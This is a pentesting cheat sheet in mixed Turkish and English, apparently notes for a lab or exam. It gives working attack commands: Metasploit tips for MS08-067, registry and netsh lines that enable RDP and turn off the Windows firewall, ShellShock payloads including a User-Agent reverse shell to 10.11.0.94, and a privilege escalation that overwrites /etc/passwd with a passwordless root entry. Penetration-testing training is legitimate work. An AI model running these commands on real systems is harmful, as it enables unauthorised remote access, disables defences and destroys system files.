# Notes\*

Eğer ms08-67 exploiti var olmasına rağmen exploit edilemiyorsa veya encoding hatası alınırsa payloadı değiştir. Daha küçük payloadlar kullan. windows/shell\_reverse\_tcp gibi. meterpreter kullanma. payload büyük olursa metasploit "Exploit failed: No encoders encoded the buffer successfully." hatasını verir.

&#x20;\*\***Eğer administrator hesabı pasif ise STATUS\_USER\_SESSION\_DELETED hatası verilir**&#x20;

## Enable RDP

```
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
```

User Yoksa:&#x20;

ERROR: Failed to open connection - NT\_STATUS\_LOGON\_FAILURE

User ve ama yetki yoksa ERROR:&#x20;

Cannot connect to svcctl pipe. NT\_STATUS\_ACCESS\_DENIED.

exploitin başarılı olması için IPC$ paylaşımına erişmesi lazım.&#x20;

"You just need access to the IPC$ share, not a named pipe."

### Disable Firewall

```
XP:
netsh firewall set opmode mode=DISABLE

New Windows Ver:
netsh advfirewall set allprofiles state off
```

### Compile C code to exe in Linux

```
i686-w64-mingw32-gcc 646.c -lws2_32 -o 646.exe
```

### ShellShock

```
env x='() { :;}; echo vulnerable' bash -c "ps aux"
env x='() { :;}; /usr/bin/id' /bin/bash -c "/usr/bin/id"
/usr/bin/env x='() { :;}; /usr/bin/id' /bin/bash -c "ps aux"
```

Find writable files for user: `find / -writable -type f 2>/dev/null | grep -v ^/proc`&#x20;

&#x20;Find files which have stickey bit on `/bin/find / -perm -4001 -type f 2>/dev/null`

### shellshock

```
User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.11.0.94/1234 0>&1
```

### Add diretory to PATH

```
export PATH=$PATH:/usr/bin/
```

### Samba version

```
msf > scanner/smb/smb_version
```

### 64 Bit c and c++ compile in Linux

```
# C
i686-w64-mingw32-gcc hello.c -o hello32.exe      # 32-bit
x86_64-w64-mingw32-gcc hello.c -o hello64.exe    # 64-bit
 
# C++
i686-w64-mingw32-g++ hello.cc -o hello32.exe     # 32-bit
x86_64-w64-mingw32-g++ hello.cc -o hello64.exe   # 64-bit
```

### ssh user enumeration

```
for user in $(cat users.txt); do python sshuserenum.py --username $user IP; done
```

### udev 2.6

[udev exploit tutorial](https://blackwintersecurity.com/tutorials/)

### If /etc/passwd is writable;

```
$ echo root::0:0:root:/root:/bin/bash > /etc/passwd
```

then;

```
su
```

root is gained!

### writable file and directory

```
find / -writable -type d 2>/dev/null
find / -writable -type f 2>/dev/null
```